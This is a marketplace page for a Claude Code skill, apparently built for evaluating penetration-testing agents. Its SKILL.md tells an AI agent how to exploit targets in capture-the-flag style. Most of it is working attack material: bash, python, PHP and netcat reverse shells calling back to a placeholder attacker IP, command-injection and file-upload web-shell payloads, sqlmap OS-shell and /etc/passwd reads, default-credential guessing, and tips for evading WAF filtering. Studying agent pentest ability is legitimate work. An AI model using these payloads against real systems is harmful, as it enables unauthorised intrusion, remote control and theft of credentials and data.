Claude Code Plugins

Community-maintained marketplace

Feedback

exploitation-knowledge

@CharlesKozel/Pentest-Agent-Evalulator
3
0

Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.

Install Skill

1Download skill
2Enable skills in Claude

Open claude.ai/settings/capabilities and find the "Skills" section

3Upload to Claude

Click "Upload skill" and select the downloaded ZIP file

Note: Please verify skill by going through its instructions before using it.

SKILL.md

name exploitation-knowledge
description Comprehensive knowledge about vulnerability exploitation and initial access. Provides expertise on finding and adapting exploits, adapting proof-of-concepts, gaining shells, and capturing user flags. Covers reverse shells, file uploads, SQL injection, and RCE vulnerabilities.

Exploitation Knowledge Base

Purpose

This knowledge base provides comprehensive exploitation methodologies and techniques. It covers converting discovered vulnerabilities into actual access, finding and adapting exploits, working in non-interactive environments, establishing stable shells, and capturing the user flag.

Core Topics Covered

  1. Exploit Discovery: Finding relevant exploits for discovered services
  2. Exploit Adaptation: Modifying exploits to work in the target environment
  3. Initial Access: Gaining command execution or shell access
  4. Shell Stabilization: Upgrading to stable, usable shells
  5. User Flag Capture: Locating and reading user.txt

Tools Available

Exploit Databases

  • searchsploit - Local exploit-db search
  • msfconsole - Metasploit framework
  • Manual search: ExploitDB, GitHub, security advisories

Shell Tools

  • Reverse shells: bash, python, php, nc
  • Web shells: PHP, ASP, JSP
  • rlwrap nc - Stabilize shells

Web Exploitation

  • sqlmap - SQL injection
  • curl - Manual web testing
  • File upload bypass techniques
  • Command injection testing

Credential Testing

  • hydra - Service brute force (limited use)
  • ssh/ftp/mysql - Test discovered credentials

Exploitation Workflow

Phase 1: Multi-Source Exploit Discovery

Core Principle: Use multiple exploit sources in parallel - never rely on a single source.

Layered Exploit Search:

# Layer 1: Local database (fastest)
searchsploit "service version"
searchsploit CVE-YYYY-XXXXX
# If found → proceed to analysis
# If not found → immediately try Layer 2

# Layer 2: Metasploit framework
msfconsole -q -x "search type:exploit name:service_name; exit"
# If found → test with msfconsole
# If not found → immediately try Layer 3

# Layer 3: Online sources (GitHub, Google)
# GitHub API search (automated)
curl -s "https://api.github.com/search/repositories?q=CVE-YYYY-XXXXX+exploit" | jq -r '.items[].html_url'

# Google search (manual if needed)
# Search: "CVE-YYYY-XXXXX exploit poc github"
# Search: "service_name version exploit"

# Layer 4: Adapt or create custom exploit
# Based on vulnerability description/advisory
# Modify existing PoC for your environment

Critical Rules:

  1. Try all layers - Don't stop at Layer 1 failure
  2. Parallel search - If time allows, search multiple sources simultaneously
  3. Cross-validate - If multiple exploits exist, try most reliable/recent first
  4. Track sources - Record which source worked in successful_paths

Phase 2: Exploit Analysis

Before running:

  1. Read the exploit code - understand what it does
  2. Check requirements - needed libraries, credentials
  3. Identify target parameters - IP, port, payload location
  4. Plan adaptation - what needs to be modified

Phase 3: Exploit Adaptation

Common modifications needed:

A. Python Exploits

# Original (interactive)
import sys
target = sys.argv[1]
shell = raw_input("Enter command: ")

# Adapted (non-interactive)
target = "10.10.10.1"
shell = "/bin/bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

B. Metasploit Exploits

# Use non-interactive mode
msfconsole -q -x "use exploit/linux/http/webmin_backdoor; set RHOSTS 10.10.10.1; set LHOST YOUR_IP; run; exit"

C. Reverse Shell Payloads

# Bash reverse shell
bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'

# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])'

# PHP reverse shell (for uploads)
<?php system("bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"); ?>

# NC reverse shell
nc YOUR_IP 4444 -e /bin/bash
# Or if -e not available:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc YOUR_IP 4444 >/tmp/f

Phase 4: Listener Setup

Always start listener before triggering exploit:

# Simple listener
nc -lvnp 4444

# Stabilized listener with rlwrap
rlwrap nc -lvnp 4444

Phase 5: Execution

Execute exploit and verify success:

# Run exploit
python3 exploit.py

# If successful, you should see connection in listener
# Test with:
id
whoami
pwd

Phase 6: Shell Stabilization

Once you have basic shell:

# Upgrade to TTY shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
# Then press Ctrl+Z
stty raw -echo; fg
export TERM=xterm

Common Attack Vectors

1. File Upload Vulnerabilities

# Test simple upload
curl -F "file=@shell.php" http://TARGET/upload.php

# Bypass restrictions
# Try: shell.php.jpg, shell.phtml, shell.php5, shell.PhP

# Find uploaded file
gobuster dir -u http://TARGET/uploads -x php,phtml

# Trigger shell
curl http://TARGET/uploads/shell.php?cmd=id

2. SQL Injection

# Test for SQLi
sqlmap -u "http://TARGET/page.php?id=1" --batch --level=5 --risk=3

# If found, try to get shell
sqlmap -u "http://TARGET/page.php?id=1" --os-shell

# Or read files
sqlmap -u "http://TARGET/page.php?id=1" --file-read=/etc/passwd

3. Command Injection

# Test common injection points
curl "http://TARGET/ping.php?ip=127.0.0.1;id"
curl "http://TARGET/ping.php?ip=127.0.0.1|whoami"
curl "http://TARGET/ping.php?ip=127.0.0.1`whoami`"

# Get reverse shell
curl "http://TARGET/ping.php?ip=;bash -c 'bash -i >& /dev/tcp/YOUR_IP/4444 0>&1'"

4. Public Exploits

# If you find CVE-2021-XXXX is applicable
# Search for PoC
searchsploit CVE-2021-XXXX
# Or check GitHub
curl -s "https://api.github.com/search/repositories?q=CVE-2021-XXXX" | jq -r '.items[].html_url'

# Download and adapt
wget https://raw.githubusercontent.com/user/repo/exploit.py
# Modify target IP, ports, payload
# Run
python3 exploit.py

5. Default Credentials

Test these FIRST before complex exploits:

# SSH
ssh admin@TARGET  # Try: admin/admin, root/root, root/toor

# FTP
ftp TARGET  # Try: anonymous/anonymous, admin/admin

# MySQL
mysql -h TARGET -u root -p  # Try: root/'', root/root

# Web Admin Panels
# Try: admin/admin, admin/password, admin/admin123

Environment Detection and Payload Adaptation

Core Principle: Always probe environment before choosing exploitation method.

Pre-Exploitation Environment Check

Check your attacking machine:

# Check critical tools and versions
java -version 2>&1 | head -1       # For JNDI, deserialization exploits
python3 --version                  # For exploit scripts
gcc --version                      # For compiling exploits
which nc netcat ncat               # For reverse shells

# Record environment limitations
# Example: If Java > 8, JNDI injection will be blocked
# Example: If no gcc, can't compile C exploits → need precompiled or script-based

Check target environment (after gaining RCE):

# Via webshell or command injection, test what's available:
which nc python python3 php perl bash sh curl wget

# Test specific versions if exploit requires them
python --version
php --version

# Check writable directories
ls -la /tmp /dev/shm /var/tmp

# Check for filtering/WAF
# Try: echo test
# Try: cat /etc/passwd
# If blocked, try base64 encoding or other bypass

Adaptive Payload Selection

Decision Tree for Reverse Shells:

1. Do we have RCE?
   └─ Yes → Proceed to step 2
   └─ No → Get RCE first (file upload, SQLi, etc.)

2. Check target environment
   └─ nc available? → Use nc reverse shell
   └─ python available? → Use python reverse shell
   └─ php available? (web server) → Use PHP reverse shell
   └─ bash available? → Use bash /dev/tcp method
   └─ None? → Upload binary or use alternative method

3. Test for filtering
   └─ Try basic command: echo test
   └─ If special chars blocked (/, &, >, |) → Use encoding:
      - Base64: echo BASE64 | base64 -d | bash
      - Hex encoding
      - URL encoding
   └─ If commands filtered by keyword → Try alternatives:
      - cat → head, tail, nl, more, less
      - nc → /dev/tcp, telnet, socat

Example Adaptive Flow:

# Step 1: Gained RCE via file upload, test environment
curl "http://TARGET/shell.php?cmd=which nc"
# Response: empty (nc not available)

# Step 2: Try python
curl "http://TARGET/shell.php?cmd=which python3"
# Response: /usr/bin/python3 (available!)

# Step 3: Use python reverse shell
curl "http://TARGET/shell.php?cmd=python3 -c 'import socket,subprocess...'"

# If that fails with error, diagnose:
# - Syntax error? → Check for character filtering
# - No response? → May be WAF blocking
# → Try base64 encoded version

Failure Diagnosis for Exploits

When exploit fails, systematically diagnose:

# Type 1: No response at all
Possible causes:
- Firewall blocking
- Wrong target IP/port
- Service actually not vulnerable
Action: Verify target is reachable, try different port, re-check vulnerability

# Type 2: Error message returned
Possible causes:
- Missing dependency (library, tool)
- Wrong syntax for target environment
- Version mismatch
Action: Read error carefully, install missing deps, adapt exploit code

# Type 3: Exploit runs but no shell
Possible causes:
- Payload blocked by filtering
- Target missing required tool (nc, python)
- Firewall blocking outbound connections
Action: Try different payload encoding, use different shell method, test with simple command first

# Type 4: Tool-specific failure (e.g., Metasploit fails)
Possible causes:
- Bug in Metasploit module
- Configuration issue
Action: Try alternative exploit source (GitHub, manual PoC), check module options

Record diagnosis in state:

jq '.failed_attempts += [{
  "exploit": "CVE-2021-12345",
  "tool": "metasploit",
  "failure_type": "no shell received",
  "diagnosis": "target missing nc, switched to python payload",
  "resolution": "used GitHub PoC with python reverse shell - success"
}]' .pentest-state.json

Handling Non-Interactive Shells

Since you're in CLI-only environment:

Execute Commands Without TTY

# Instead of interactive shell, use command execution
curl http://TARGET/shell.php?cmd=cat+/etc/passwd

# Chain commands
curl http://TARGET/shell.php?cmd=cd+/home;ls+-la

# Use semicolons
curl http://TARGET/shell.php?cmd=id;whoami;pwd

Background Reverse Shells

# Start listener in background
nc -lvnp 4444 > shell-output.txt 2>&1 &

# Trigger exploit
python3 exploit.py

# Check output
cat shell-output.txt

# Send commands via named pipe
mkfifo /tmp/pipe
nc YOUR_IP 4444 < /tmp/pipe | /bin/bash > /tmp/pipe 2>&1 &

User Flag Capture

Once you have command execution:

1. Locate User Flag

# Search for user.txt
find / -name "user.txt" 2>/dev/null
find /home -name "user.txt" 2>/dev/null
find /home -name "*.txt" 2>/dev/null

# Common locations
cat /home/*/user.txt
cat /home/user/user.txt

2. Read and Verify

# Read flag
cat /home/username/user.txt

# Verify format (should be 32-char hex)
cat /home/username/user.txt | wc -c  # Should be 33 (32 + newline)

3. Update State

# Save to state file
USER_FLAG=$(cat /home/username/user.txt)
jq --arg flag "$USER_FLAG" '.flags.user = $flag' .pentest-state.json > tmp.json && mv tmp.json .pentest-state.json

Troubleshooting Failed Exploits

Common Issues

  1. "Connection refused"

    • Check listener is running: netstat -tlnp | grep 4444
    • Verify firewall allows connections
    • Try different port

  2. "Module not found" (Python)

    • Install: pip3 install requests pycrypto
    • Or adapt code to remove dependency

  3. "Permission denied"

    • Exploit may need root privileges
    • Try different vulnerability

  4. "Exploit works but no shell"

    • Check payload syntax
    • Try different reverse shell method
    • Verify target has bash/python/nc

  5. "Timeout" or "No response"

    • Target may have WAF/IDS
    • Try encoding payload
    • Use slower, stealthier approach

Decision Tree

Found Vulnerability
│
├─ Is there a public exploit?
│  ├─ Yes → Search searchsploit/GitHub
│  │       → Adapt and run
│  └─ No → Can you write custom exploit?
│          → Develop PoC
│
├─ Initial Access Gained?
│  ├─ Yes → Capture user flag
│  │       → Proceed to privilege escalation
│  └─ No → Try alternative vector
│          → Review reconnaissance data
│          → Attempt different service
│
└─ Stuck after 3 attempts?
   → Re-run reconnaissance
   → Look for overlooked services
   → Check for misconfigurations

Output Format

After successful exploitation:

{
  "status": "user_access_gained",
  "method": "File upload RCE via /uploads",
  "access_level": "www-data",
  "shell_type": "non-interactive webshell",
  "user_flag": "a1b2c3d4e5f6g7h8i9j0k1l2m3n4o5p6",
  "credentials_found": [],
  "next_steps": "Privilege escalation required for root flag"
}

Success Criteria

Success criteria:

  1. ✅ Command execution achieved on target
  2. ✅ User flag located and read
  3. ✅ Flag is 32-character hexadecimal string
  4. ✅ Access documented in state file
  5. ✅ Ready to proceed to privilege escalation phase

Key Principles

  1. Adapt exploits - public exploits rarely work as-is
  2. Handle non-interactive - CLI-only environment requires creativity
  3. Verify success - always test access with id, whoami
  4. Capture flag - don't proceed without user.txt content
  5. Document method - save successful path for future reference

Remember

  • Try simple before complex (default creds before 0-days)
  • Read exploit code before running (understand what it does)
  • Non-interactive shells require different commands
  • User flag MUST be captured before moving to privesc
  • If stuck, revisit reconnaissance for missed vectors